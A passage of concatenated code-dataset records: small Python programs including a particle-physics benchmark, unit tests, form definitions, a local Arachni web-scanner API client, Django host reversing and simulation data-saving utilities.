find(self,ident):\n def recurse(node):\n if ident < node.ident:\n if node.left == None:\n return False\n elif node.left.ident == ident:\n return True\n else:\n return recurse(node.left)\n else:\n if node.right == None:\n return False\n elif node.right.ident == ident:\n return True\n else:\n return recurse(node.right)\n\n if self.root == None:\n return False\n elif self.root.ident == ident:\n return True\n else:\n return recurse(self.root)\n","sub_path":"projects/project6/binsearch.py","file_name":"binsearch.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"552009518","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# =============================================================================\n# $Id$ \n# =============================================================================\n## @file TestTransporters.py\n#\n# Compare CPU performance for particle transporters \n#\n# This file is a part of \n# Bender project\n# ``Python-based Interactive Environment for Smart and Friendly \n# Physics Analysis''\n#\n# The package has been designed with the kind help from\n# Pere MATO and Andrey TSAREGORODTSEV. \n# And it is based on the \n# LoKi project:\n# ``C++ ToolKit for Smart and Friendly Physics Analysis''\n#\n# By usage of this code one clearly states the disagreement \n# with the smear campaign of Dr.O.Callot et al.: \n# ``No Vanya's lines are allowed in LHCb/Gaudi software.''\n#\n# @author Vanya BELYAEV Ivan.Belyaev@itep.ru\n# @date 2016-01-14\n#\n# $Revision$\n# Last modification $Date$\n# by $Author$\n# =============================================================================\n\"\"\"Compare CPU performance for particle transporters \n\noooooooooo. .o8 \n`888' `Y8b \\\"888 \n 888 888 .ooooo. ooo. .oo. .oooo888 .ooooo. 
oooo d8b \n 888oooo888' d88' `88b `888P\\\"Y88b d88' `888 d88' `88b `888\\\"\\\"8P \n 888 `88b 888ooo888 888 888 888 888 888ooo888 888 \n 888 .88P 888 .o 888 888 888 888 888 .o 888 \no888bood8P' `Y8bod8P' o888o o888o `Y8bod88P\\\" `Y8bod8P' d888b \n\nThis file is a part of BENDER project:\n ``Python-based Interactive Environment for Smart and Friendly Physics Analysis''\n\nThe project has been designed with the kind help from\nPere MATO and Andrey TSAREGORODTSEV. \n\nAnd it is based on the LoKi project:\n ``C++ ToolKit for Smart and Friendly Physics Analysis''\n\nBy usage of this code one clearly states the disagreement \nwith the smear campaign of Dr.O.Callot et al.: \n ``No Vanya's lines are allowed in LHCb/Gaudi software.''\n\n $Revision$\nLast modification $Date$\n by $Author$\n\"\"\"\n# =============================================================================\n__author__ = \" Vanya BELYAEV Ivan.Belyaev@itep.ru \"\n__date__ = \" 2016-01-15 \" \n__version__ = \"$Revision$ \"\n# ============================================================================= \n## optional logging\n# =============================================================================\nfrom Bender.Logger import getLogger\nif '__main__' == __name__ : logger = getLogger ( 'TestTransporters' )\nelse : logger = getLogger ( __name__ )\n# =============================================================================\n## import everything from bender \nfrom Bender.Main import *\nfrom GaudiKernel.SystemOfUnits import cm , GeV\n# =============================================================================\n## @class TransportersTest\n# Compare CPU performance for particle transporters \n# @author Vanya BELYAEV Ivan.Belyaev@itep.ru\n# @date 2016-01-14\nclass TransportersTest(Algo):\n \"\"\"\n Compare CPU performance for particle transporters \n \"\"\"\n def initialize ( self ) :\n \n sc = Algo.initialize ( self )\n if sc.isFailure() : return sc\n \n IPT = cpp.IParticleTransporter\n \n self.tr1 = self.tool( IPT ,'ParticleTransporter/PT1' , parent=self )\n if not self.tr1 : return FAILURE\n \n self.tr2 = self.tool( IPT ,'DaVinci::ParticleTransporter/PT2' , parent=self )\n if not self.tr2 : return FAILURE\n \n self.tr3 = self.tool( IPT ,'DaVinci::ParticleTransporter/PT3' , parent=self )\n if not self.tr3 : return FAILURE \n\n self.zpos = [ 5 * i * cm for i in range ( -10 , 10 ) ]\n ## self.zpos += [ 20 * i * cm for i in range ( 3 , 10 ) ]\n \n for t in self.tr1,self.tr2,self.tr3 :\n sc = cpp.Gaudi.Utils.setProperty( t , 'MeasureCPUPerformance' , 'true' )\n if sc.isFailure() :\n self.Error('CANNOT set property !!' )\n self.nevt = 0 \n return sc\n \n def finalize ( self ) :\n \n del self.tr1\n del self.tr2\n del self.tr3\n\n return Algo.finalize ( self ) \n\n def cpu ( self , particles, transporter , tag ) :\n\n csvc = self.chronoSvc().get() \n particle = LHCb.Particle() \n \n chrono = cpp.Chrono( csvc , tag )\n for z in self.zpos :\n if -30 * cm < z < 100 * cm : \n for p in particles:\n sc = transporter.transport ( p , z , particle )\n\n del chrono\n \n \n ## the main 'analysis' method \n def analyse( self ) : ## IMPORTANT! 
\n \"\"\"\n The main 'analysis' method\n \"\"\"\n\n self.nevt += 1\n \n particles = self.select('all', PALL )\n if not particles : \n return self.Warning( \"No particles are found\", SUCCESS )\n \n \n if self.nevt < 10 :\n\n if 1<= len(particles) :\n \n part0 = particles[0]\n part_ = LHCb.Particle()\n for z in self.zpos :\n if abs ( z ) < 10 * cm : \n self.tr3.transport ( part0 , z , part_ )\n \n self.cpu ( particles , self.tr1 , 'tr1-0' )\n self.cpu ( particles , self.tr2 , 'tr2-0' )\n \n else :\n \n #self.cpu ( particles , self.tr1 , 'tr1-1' )\n #self.cpu ( particles , self.tr2 , 'tr2-1' )\n \n self.cpu ( particles , self.tr1 , 'tr1-2' )\n self.cpu ( particles , self.tr2 , 'tr2-2' )\n \n ## \n return SUCCESS ## IMPORTANT!!! \n# =============================================================================\n\n# =============================================================================\n## The configuration of the job\ndef configure ( inputdata , ## the list of input files \n catalogs = [] , ## xml-catalogs (filled by GRID)\n castor = False , ## use the direct access to castor/EOS ? \n params = {} ) :\n \n ## import DaVinci \n from Configurables import DaVinci\n ## delegate the actual configuration to DaVinci\n dv = DaVinci ( DataType = '2012' ,\n InputType = 'DST' )\n \n ## add the name of Bender algorithm into User sequence sequence \n alg_name = 'Transporters'\n dv.UserAlgorithms += [ alg_name ]\n \n from StandardParticles import StdLooseKaons, StdLoosePions\n kaons = StdLooseKaons.outputLocation()\n pions = StdLoosePions.outputLocation()\n \n ## define the input data\n setData ( inputdata , catalogs , castor )\n \n ## get/create application manager\n gaudi = appMgr() \n \n ## (1) create the algorithm with given name \n alg = TransportersTest (\n alg_name ,\n Inputs = [ kaons, pions ]\n )\n \n \n return SUCCESS \n# =============================================================================\n\n# =============================================================================\n## Job steering \nif __name__ == '__main__' :\n\n logger.info ( 80*'*' ) \n logger.info ( __doc__ ) \n logger.info ( ' Author : %s ' % __author__ ) \n logger.info ( ' Version : %s ' % __version__ ) \n logger.info ( ' Date : %s ' % __date__ ) \n logger.info ( 80*'*' ) \n \n ## job configuration\n ## BKQuery ( '/LHCb/Collision12/Beam4000GeV-VeloClosed-MagDown/Real Data/Reco14/Stripping20/90000000/DIMUON.DST' )\n inputdata = [\n '/lhcb/LHCb/Collision12/DIMUON.DST/00020198/0001/00020198_00012742_1.dimuon.dst',\n '/lhcb/LHCb/Collision12/DIMUON.DST/00020198/0001/00020198_00015767_1.dimuon.dst',\n '/lhcb/LHCb/Collision12/DIMUON.DST/00020198/0000/00020198_00007306_1.dimuon.dst',\n '/lhcb/LHCb/Collision12/DIMUON.DST/00020198/0001/00020198_00016402_1.dimuon.dst',\n '/lhcb/LHCb/Collision12/DIMUON.DST/00020198/0000/00020198_00002692_1.dimuon.dst',\n '/lhcb/LHCb/Collision12/DIMUON.DST/00020738/0000/00020738_00005943_1.dimuon.dst',\n '/lhcb/LHCb/Collision12/DIMUON.DST/00020350/0000/00020350_00008129_1.dimuon.dst',\n '/lhcb/LHCb/Collision12/DIMUON.DST/00021211/0000/00021211_00000461_1.dimuon.dst',\n '/lhcb/LHCb/Collision12/DIMUON.DST/00021211/0000/00021211_00001009_1.dimuon.dst',\n '/lhcb/LHCb/Collision12/DIMUON.DST/00020350/0000/00020350_00001011_1.dimuon.dst',\n ]\n configure( inputdata , castor = True )\n \n ## event loop \n run(500)\n\n# =============================================================================\n# The END\n# 
=============================================================================\n\n\n","sub_path":"Bender/Ex/BenderExample/python/BenderExample/Transporters.py","file_name":"Transporters.py","file_ext":"py","file_size_in_byte":9054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"498280342","text":"\"\"\"Elenca gli impianti della lessinia\"\"\"\nQUOTA_PARTENZA = 13\nQUOTA_ARRIVO = 14\nSEP = \",\"\n\n\ndef process_file(filename, alt_min=0, alt_max=10000):\n file = open(filename)\n header = True\n \n for line in file:\n if header:\n header = False\n else:\n values = line.split(SEP)\n quota_partenza = values[QUOTA_PARTENZA]\n quota_arrivo = values[QUOTA_ARRIVO]\n \n if quota_partenza.strip() and quota_arrivo.strip():\n if int(quota_partenza) >= alt_min and int(quota_arrivo) <= alt_max:\n print(line, end=\"\")\n file.close()\n\nif __name__ == \"__main__\":\n filename = \"lista_impianti.csv\"\n process_file(filename, 1000, 1600)\n","sub_path":"Lectio05/lista_impianti.py","file_name":"lista_impianti.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"618441712","text":"def substring_index(s, sub):\n \"\"\"\n function to tell is substring in string and if yes then return the starting index\n :param s: full string\n :param sub: substring to be checked\n :return: -1 if not there else starting index of the substring\n \"\"\"\n index = s.find(sub)\n return index\n\n\ns = input(\"Enter the string: \")\nsub = input(\"Enter the substring to find: \")\nresult = substring_index(s, sub)\nif result == -1:\n print(\"Substring not found\")\nelse:\n print(\"substring found at index\", result)\n","sub_path":"string_manipulations/find2.py","file_name":"find2.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"238092609","text":"class Solution:\n \"\"\"\n @param nums: A set of numbers.\n @return: A list of lists. 
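# The subsetsWithDup method in the record below prunes duplicate branches
# by sorting nums and skipping equal neighbours at the same depth. A
# self-contained brute-force cross-check (helper name is illustrative):
from itertools import combinations

def subsets_with_dup_bruteforce(nums):
    nums = sorted(nums)
    seen, result = set(), []
    for r in range(len(nums) + 1):
        for idx in combinations(range(len(nums)), r):
            subset = tuple(nums[i] for i in idx)
            if subset not in seen:  # dedupe by the chosen multiset
                seen.add(subset)
                result.append(list(subset))
    return result

print(subsets_with_dup_bruteforce([1, 2, 2]))
# -> [[], [1], [2], [1, 2], [2, 2], [1, 2, 2]]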
All valid subsets.\n \"\"\"\n def subsetsWithDup(self, nums):\n # write your code here\n nums.sort()\n results = []\n self.dfs(nums, 0, [], results)\n return results\n\n def dfs(self, nums, start_idx, subset, results):\n results.append(list(subset))\n\n for i in range(start_idx, len(nums)):\n if i != 0 and nums[i] == nums[i-1] and i > start_idx:\n continue\n subset.append(nums[i])\n self.dfs(nums, i+1, subset, results)\n subset.pop()\n\n\n\ndef main():\n nums = [] # [1, 2, 2]\n sol = Solution()\n results = sol.subsetsWithDup(nums)\n print(results)\n\n\nmain()\n","sub_path":"lint-018-subsets-ii/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"471044284","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import (\n print_function,\n division,\n absolute_import)\nfrom six.moves import xrange\n\n# =============================================================================\n# Imports\n# =============================================================================\n\nfrom numpy.testing import (\n assert_array_equal,\n assert_array_less,\n assert_allclose,\n assert_array_max_ulp,\n assert_array_almost_equal_nulp)\nimport unittest\n\nimport os\nimport numpy as np\n\n# =============================================================================\n# Module variables\n# =============================================================================\n\n# =============================================================================\n# Functions\n# =============================================================================\n\n\ndef load_test_data():\n from kamrecsys.data import EventWithScoreData\n from kamrecsys.datasets import SAMPLE_PATH\n\n infile = os.path.join(SAMPLE_PATH, 'pci.event')\n dtype = np.dtype([('event', 'U18', 2), ('score', np.float)])\n x = np.genfromtxt(fname=infile, delimiter='\\t', dtype=dtype)\n data = EventWithScoreData(n_otypes=2, n_stypes=1,\n event_otypes=np.array([0, 1]))\n data.set_events(x['event'], x['score'], score_domain=(1.0, 5.0, 0.5))\n return data, x\n\n\n# =============================================================================\n# Test Classes\n# =============================================================================\n\n\nclass TestEventUtilMixin(unittest.TestCase):\n\n def test_to_eid_event(self):\n data, x = load_test_data()\n\n # test to_eid_event\n check = data.to_eid_event(data.event)\n assert_array_equal(x['event'], check)\n\n # test to_eid_event / per line conversion\n check = np.empty_like(data.event, dtype=x['event'].dtype)\n for i, j in enumerate(data.event):\n check[i, :] = data.to_eid_event(j)\n assert_array_equal(x['event'], check)\n\n def test_to_iid_event(self):\n from kamrecsys.data import EventWithScoreData\n data, x = load_test_data()\n\n # test EventData.to_iid_event\n assert_array_equal(data.event, data.to_iid_event(x['event']))\n\n # test EventData.to_iid_event / per line conversion\n check = np.empty_like(x['event'], dtype=np.int)\n for i, j in enumerate(x['event']):\n check[i, :] = data.to_iid_event(j)\n assert_array_equal(data.event, check)\n\n\nclass TestEventWithScoreData(unittest.TestCase):\n\n def test_set_events(self):\n data, x = load_test_data()\n\n # test info related to scores\n assert_allclose(data.score[:5], [3., 4., 3.5, 5., 3.])\n assert_allclose(data.score_domain, [1.0, 5.0, 0.5])\n self.assertEqual(data.n_scores, 1)\n self.assertEqual(data.n_score_levels, 
9)\n\n def test_digitize_score(self):\n data, x = load_test_data()\n\n digitized_scores = data.digitize_score()\n assert_array_equal(digitized_scores[:5], [4, 6, 5, 8, 4])\n assert_array_equal(digitized_scores[-5:], [4, 3, 4, 5, 6])\n\n digitized_scores = data.digitize_score(np.linspace(1.0, 5.0, 9))\n assert_array_equal(digitized_scores, np.arange(9))\n\n# =============================================================================\n# Main Routines\n# =============================================================================\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"kamrecsys/data/tests/test_event.py","file_name":"test_event.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"83754486","text":"import re\nimport pandas\n\ndef read_txt(filepath):\n with open(filepath,'r',encoding='utf-8') as f:\n return f.read()\n\ndef parse_line(line):\n flag=re.findall('^input|^output',line)\n if flag:\n \n print(line)\n \n record={}\n\n portname=re.sub('(input|output|//.*|\\[.*?\\]| |,)','',line)\n print(portname)\n if portname:\n record['PortName']=portname\n record['HCMSingalname']=portname+'_wire'\n\n reg = r'(`ifdef.*?)\\n' + '.*' + line + r'.*endif'\n reg = reg.replace('[', '\\[').replace(']', '\\]')\n if re.findall(reg,txt,re.S):\n record['备注']=re.findall(reg,txt,re.S)[0]\n else:\n record['备注']=None\n \n type_io=flag[0]\n \n record['input/output']=type_io\n if type_io=='input': \n record['Source']=None\n record['Destination']=modelname\n \n else:\n record['Source']=modelname\n record['Destination']=None\n\n description=re.findall('(//.*?$)',line)\n if description:\n record['描述']=description[0]\n else:\n record['描述']=None\n \n width=re.findall('\\[(.*?)\\]',line)\n if width:\n if re.findall('^(\\d+):(\\d+)$',width[0]):\n a,b=re.findall('^(\\d+):(\\d+)$',width[0])[0]\n a,b=int(a),int(b)\n record['PortWidthSource']=a-b+1\n\n if re.findall('^.*?-\\d+:\\d+$',width[0]):\n record['PortWidthSource']=width[0]\n else:\n \n record['PortWidthSource']=1\n\n print(record)\n return(record)\n else:\n return None\n\n\n\ncolumns=['PortName','input/output','PortWidthSource','Source','Destination','HCMSingalname','描述','备注']\n\n\nrecords=[]\n\ntxt=read_txt(filepath='AX.v')\nlines=txt.split('\\n')\n\n\nmodelname=re.findall('module (.*?)\\(',txt)\nif modelname:\n modelname=modelname[0]\nfor line in lines:\n record=parse_line(line)\n if record:\n records.append(record)\n\ndf=pandas.DataFrame(records)\ndf=df.reindex(columns=columns)\n\ndf.to_excel('out.xlsx',index=None,encoding='utf-8-sig')\n\n\n\n","sub_path":"job/囧-正则提取数据/正则提取数据.py","file_name":"正则提取数据.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"182158053","text":"from flask_wtf import Form\nfrom wtforms.fields import StringField, IntegerField, FloatField\nfrom wtforms.fields.html5 import URLField\nfrom wtforms.validators import DataRequired, url\n\nclass MovieDetailsForm(Form):\n title = StringField('title', validators=[DataRequired()])\n year = IntegerField('year')\n rated = StringField('rated')\n released = StringField('released')\n writer = StringField('writer')\n runtime = StringField('runtime')\n genre = StringField('genre')\n director = StringField('director')\n actors = StringField('actors')\n plot = StringField('plot')\n language = StringField('language')\n country = StringField('country')\n awards = StringField('awards')\n poster = 
URLField('poster', validators=[url()])\n metascore = FloatField('metascore')\n imdb_rating = FloatField('imdb_rating')\n imdb_votes = IntegerField('imdb_votes')\n imdb_id = StringField('imdb_id', validators=[DataRequired()])\n type = StringField('type')","sub_path":"forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"134440798","text":"#!/usr/bin/python3\n\nimport json\nimport requests\nimport argparse\nimport arachni_elasticsearch\n\nrequestURL = 'http://127.0.0.1:7331'\nheaders = {'Content-Type': 'application/json', 'Accept-Encoding': None}\n#es = Elasticsearch([{'host': 'localhost', 'port': 9200}])\n\ndef new_scan(scan_url, scan_checks = None):\n if scan_checks is None:\n params = {\"url\":scan_url}\n else:\n params = {\"url\":scan_url, \"checks\":scan_checks}\n\n responseURL = requestURL + \"/scans\"\n response = requests.post(responseURL, data = json.dumps(params),headers=headers)\n return response\n\ndef monitor_scan(scan_id):\n responseURL = requestURL + \"/scans/\" + scan_id\n response = requests.get(responseURL)\n return response\n\ndef retrieve_report(scan_id):\n responseURL = requestURL + \"/scans/\" + scan_id + \"/report.json\"\n response = requests.get(responseURL)\n response.headers = headers\n return response\n\ndef pause_scan(scan_id):\n responseURL = requestURL + \"/scans/\" + scan_id + \"/pause\"\n response = requests.put(responseURL,headers=headers)\n return response\n\ndef resume_scan(scan_id):\n responseURL = requestURL + \"/scans/\" + scan_id + \"/resume\"\n response = requests.put(responseURL,headers=headers)\n return response\n\ndef shutdown_scan(scan_id):\n responseURL = requestURL + \"/scans/\" + scan_id\n response = requests.delete(responseURL,headers=headers)\n return response\n\ndef get_status(scan_id):\n scan_status = monitor_scan(scan_id)\n status_json = scan_status.json()\n return status_json['busy']\n\ndef main():\n parser = argparse.ArgumentParser(description=\"Arachni Web Scanner\")\n parser.add_argument('-u',\"--url\",required=True, help=\"URL to scan\")\n parser.add_argument('-c',\"--checks\", help=\"checks (type '*' to scan all\")\n args = parser.parse_args()\n\n checks = ['*']\n\n url_scan = new_scan(args.url,checks)\n scan_json = url_scan.json()\n scan_id = scan_json['id']\n print(\"Scan ID: \" + scan_id)\n print('Scanning in Progress...')\n\n scan_status = get_status(scan_id)\n\n while scan_status is True:\n scan_status = get_status(scan_id)\n\n arachni_elasticsearch.add_report(scan_id)\n shutdown_scan(scan_id)\n print('Scan ID: ' + scan_id + ' finished.')\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"arachni_python.py","file_name":"arachni_python.py","file_ext":"py","file_size_in_byte":2456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"467011024","text":"from 单科2专业 import majorscore,sggraderemmendation\nfrom grade1 import getrecommendation1\nimport pandas as pd\nfrom 竞赛2专业 import recommand,group_score\nfrom 问卷2专业 import Recommendation_of_Major\n\ndef main():\n province='江苏'\n category='理科'\n college='复旦大学'\n rank=2000\n #major=\"纺织工程(普通类)\" \n gradelist={\"数学\":140,\"语文\":130,\"外语\":120,\"物理\":90,\"化学\":100,\"生物\":90,\"历史\":0,\"政治\":0,\"地理\":0,\"技术\":0}\n exp=[['全国中学生科普科幻作文大赛','全国一等奖'],['全国青少年科学影像大赛','提名奖']]\n #exp=[['全国中学生数学竞赛','国家二等奖'],['中国青少年机器人竞赛','二等奖']]\n 
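# The arachni_python.py record above waits for a scan by calling
# get_status() in a tight loop, which hammers the REST API. A gentler
# polling sketch; the interval and timeout values are illustrative,
# not taken from the original:
import time

def wait_for_scan(scan_id, poll_seconds=5, timeout_seconds=3600):
    deadline = time.monotonic() + timeout_seconds
    while time.monotonic() < deadline:
        if not get_status(scan_id):  # scan no longer busy
            return True
        time.sleep(poll_seconds)
    return False  # timed out while the scan was still running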
answer={1:'A',2:'B',3:'C',4:'D',5:'D',6:'A',7:'B',8:'D',9:'C',10:'D',11:'C',12:'D',13:'C',14:'D',15:'C',16:'C',17:'C',18:'C'}\n result=getr(province, category, college,rank,exp,gradelist,answer)\n\n\ndef getsgscore(province, category, college, rank,exp,gradelist,answer):\n sgscore={} \n gradescore=sggraderemmendation(gradelist,province,category)\n competitionscore=recommand(group_score(exp))\n questionscore=Recommendation_of_Major(answer)\n wg=wc=wq=1/3\n for key,values in gradescore.items():\n sgscore[key]=gradescore[key]*wg+competitionscore[key]*wc+questionscore[key]*wq\n return sgscore\n\n\ndef getr(province, category, college, rank,exp,gradelist,answer):\n \n rrc=getrecommendation1(province, category, college, rank)\n if(rrc==0):\n print(\"我们系统不推荐这个大学\")\n return\n \n sgscore=getsgscore(province, category, college, rank,exp,gradelist,answer)\n result=[]\n for temp in rrc:\n major=temp[-1]\n risk=temp[1]\n r1=temp[0]\n r2=majorscore(major,sgscore)\n \n w1=0.5\n w2=0.5\n \n rl=r1*w1+r2*w2\n \n result.append([rl,risk,major])\n \n result.sort(reverse=True)\n \n for i in range(len(result)):\n result[i]=[result[i][-1],result[i][0],result[i][1]]\n result=pd.DataFrame(result, columns=['专业', '推荐度', '风险值'])\n print(result)\n \n \nif __name__ == '__main__':\n main()","sub_path":"aiC/Presentation/Model/fusion.py","file_name":"fusion.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"571618366","text":"from django import forms\nfrom django.db.models import fields\nfrom .models import *\n\n\nclass RecetaForm(forms.ModelForm):\n class Meta:\n model = Receta\n exclude = ['paciente', 'estado']\n\n def __init__(self, *args, **kwargs):\n super(RecetaForm, self).__init__(*args, **kwargs)\n self.fields['sintoma'].queryset = Sintoma.objects.filter(estado=True)\n self.fields['diagnostico'].queryset = Diagnostico.objects.filter(estado=True)\n self.fields['gabinete'].queryset = EstudioGabinete.objects.filter(estado=True)\n for k, v in self.fields.items():\n self.fields[k].widget.attrs['required'] = \"true\"\n self.fields[k].widget.attrs['class'] = \"form-control\"\n","sub_path":"appconsulta/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"628352683","text":"import re\n\nfrom django.conf import settings\nfrom django.core.exceptions import ImproperlyConfigured\nfrom django.core.urlresolvers import NoReverseMatch, reverse\nfrom django.utils import six\nfrom django.utils.encoding import iri_to_uri, force_text\nfrom django.utils.functional import memoize, lazy\nfrom django.utils.importlib import import_module\nfrom django.utils.regex_helper import normalize\n\nfrom django_hosts.defaults import host as host_cls\n\n_hostconf_cache = {}\n_hostconf_module_cache = {}\n_host_patterns_cache = {}\n_host_cache = {}\n\n\ndef get_hostconf():\n try:\n return settings.ROOT_HOSTCONF\n except AttributeError:\n raise ImproperlyConfigured(\"Missing ROOT_HOSTCONF setting\")\nget_hostconf = memoize(get_hostconf, _hostconf_cache, 0)\n\n\ndef get_hostconf_module(hostconf=None):\n if hostconf is None:\n hostconf = get_hostconf()\n return import_module(hostconf)\nget_hostconf_module = memoize(get_hostconf_module, _hostconf_module_cache, 1)\n\n\ndef get_host(name):\n for host in get_host_patterns():\n if host.name == name:\n return host\n raise NoReverseMatch(\"No host called '%s' exists\" % name)\nget_host = 
memoize(get_host, _host_cache, 1)\n\n\ndef get_host_patterns():\n hostconf = get_hostconf()\n module = get_hostconf_module(hostconf)\n try:\n return module.host_patterns\n except AttributeError:\n raise ImproperlyConfigured(\"Missing host_patterns in '%s'\" %\n hostconf)\nget_host_patterns = memoize(get_host_patterns, _host_patterns_cache, 0)\n\n\ndef clear_host_caches():\n global _hostconf_cache, _hostconf_module_cache, _host_patterns_cache, _host_cache\n _hostconf_cache.clear()\n _hostconf_module_cache.clear()\n _host_patterns_cache.clear()\n _host_cache.clear()\n\n\ndef reverse_host(host, args=None, kwargs=None):\n \"\"\"\n Given the host name and the appropriate parameters,\n reverses the host, e.g.::\n\n >>> from django.conf import settings\n >>> settings.ROOT_HOSTCONF = 'mysite.hosts'\n >>> settings.PARENT_HOST = 'example.com'\n >>> from django_hosts.reverse import reverse_host\n >>> reverse_host('with_username', 'jezdez')\n 'jezdez.example.com'\n\n :param name: the name of the host as specified in the hostconf\n :args: the host arguments to use to find a matching entry in the hostconf\n :kwargs: similar to args but key value arguments\n :raises django.core.urlresolvers.NoReverseMatch: if no host matches\n :rtype: reversed hostname\n \"\"\"\n if args and kwargs:\n raise ValueError(\"Don't mix *args and **kwargs in call to reverse()!\")\n\n args = args or ()\n kwargs = kwargs or {}\n\n if not isinstance(host, host_cls):\n host = get_host(host)\n\n unicode_args = [force_text(x) for x in args]\n unicode_kwargs = dict(((k, force_text(v))\n for (k, v) in six.iteritems(kwargs)))\n\n for result, params in normalize(host.regex):\n if args:\n if len(args) != len(params):\n continue\n candidate = result % dict(zip(params, unicode_args))\n else:\n if set(kwargs.keys()) != set(params):\n continue\n candidate = result % unicode_kwargs\n\n if re.match(host.regex, candidate, re.UNICODE): # pragma: no cover\n parent_host = getattr(settings, 'PARENT_HOST', '').lstrip('.')\n if parent_host:\n # only add the parent host when needed (aka www-less domain)\n if candidate and candidate != parent_host:\n candidate = '%s.%s' % (candidate, parent_host)\n else:\n candidate = parent_host\n return candidate\n\n raise NoReverseMatch(\"Reverse host for '%s' with arguments '%s' \"\n \"and keyword arguments '%s' not found.\" %\n (host.name, args, kwargs))\n\n\ndef reverse_full(host, view,\n host_args=None, host_kwargs=None,\n view_args=None, view_kwargs=None):\n \"\"\"\n Given the host and view name and the appropriate parameters,\n reverses the fully qualified URL, e.g.::\n\n >>> from django.conf import settings\n >>> settings.ROOT_HOSTCONF = 'mysite.hosts'\n >>> settings.PARENT_HOST = 'example.com'\n >>> from django_hosts.reverse import reverse_full\n >>> reverse_full('www', 'about')\n '//www.example.com/about/'\n\n You can set the used scheme in the host object.\n\n :param host: the name of the host\n :param view: the name of the view\n :host_args: the host arguments\n :host_kwargs: the host keyed arguments\n :view_args: the arguments of the view\n :view_kwargs: the keyed arguments of the view\n :rtype: fully qualified URL with path\n \"\"\"\n host = get_host(host)\n host_part = reverse_host(host,\n args=host_args,\n kwargs=host_kwargs)\n path_part = reverse(view,\n args=view_args or (),\n kwargs=view_kwargs or {},\n urlconf=host.urlconf)\n return iri_to_uri('%s%s%s' % (host.scheme, host_part, path_part))\n\nreverse_full_lazy = lazy(reverse_full, 
str)\n","sub_path":"django_hosts/reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":5234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"606452120","text":"# 1. Read in the date string (YYYYMMDD)\ndate = input(\"Please enter a date (YYYYMMDD): \")\n# 2. Slice out year, month and day\nyear = int(date[0: 4: 1])\nmonth = int(date[4: 6])\nday = int(date[6: 8])\n# Use \\ as a line-continuation character\n#print(\"%s %s %s\" % \\\n# (year, month \\\n# , day))\n# 3. Store the number of days of each month in a list\ndaysNum = 0\nmonths = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n# 4. In a leap year, February has 29 days\nif (year % 400 == 0) or ((year % 4 == 0) and (year % 100 != 0)):\n months[1] = 29\n# 5. Accumulate the days of the preceding months\nfor i in range(month - 1):\n daysNum += months[i]\ndaysNum += day\nprint(\"Day of year:\", daysNum)\n","sub_path":"Hello/day03/天数.py","file_name":"天数.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"443901448","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 25 08:41:10 2017\n\n@author: Yann Roussel and Tuan Bui\nEdited by: Emine Topcu on Sep 2021\n\"\"\"\nfrom collections import Counter\n\nimport Const\nimport json\nimport matplotlib.image as mpimg\nimport numpy as np\n# Import pandas for data saving\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nfrom matplotlib import rcParams, animation\nfrom numpy import zeros\n\nfrom Analysis_tools import angles_\n\ndef saveToJSON(filename, content):\n jscontent = json.dumps(content)\n f = open(filename,\"w\")\n f.write(jscontent)\n f.close()\n\ndef readFromJSON(filename):\n f = open(filename,\"r\")\n jscontent = f.read() \n content = json.loads(jscontent)\n f.close()\n return content\n \n\n# The keys of the LeftValues and RightValues dictionaries are the cell names, like \"IC\", \"MN\" etc\n# The column names in the csv file start with Left_IC, Right_MN, etc and end with cell number\n# There are no gaps between the columns of the same neuron type and side.\n# For each cell type, first left cells, then right cells are saved\ndef saveToCSV(filename, Time, LeftValues, RightValues):\n\n #check for input accuracy - a file name and Time array need to be provided\n if filename is None or Time is None or\\\n dict(LeftValues).keys() != dict(RightValues).keys():\n return\n\n #Sim_data is the pandas dataframe that will be used to save into a .csv\n Sim_data = pd.DataFrame(index=Time)\n for cellname in dict(LeftValues).keys():\n groupValues = LeftValues[cellname]\n numcells = len(groupValues)\n for j in range(0, numcells):\n header_name = 'Left_' + cellname + str(j)\n col_df = pd.DataFrame(index = Time, data = groupValues[j], columns = [header_name])\n Sim_data = pd.concat([Sim_data, col_df], axis= 1)\n groupValues = RightValues[cellname]\n for k in range(0, numcells):\n header_name = 'Right_' + cellname + str(k)\n col_df = pd.DataFrame(index = Time, data = groupValues[k], columns = [header_name])\n Sim_data = pd.concat([Sim_data, col_df], axis= 1)\n\n Sim_data.to_csv(filename, index_label 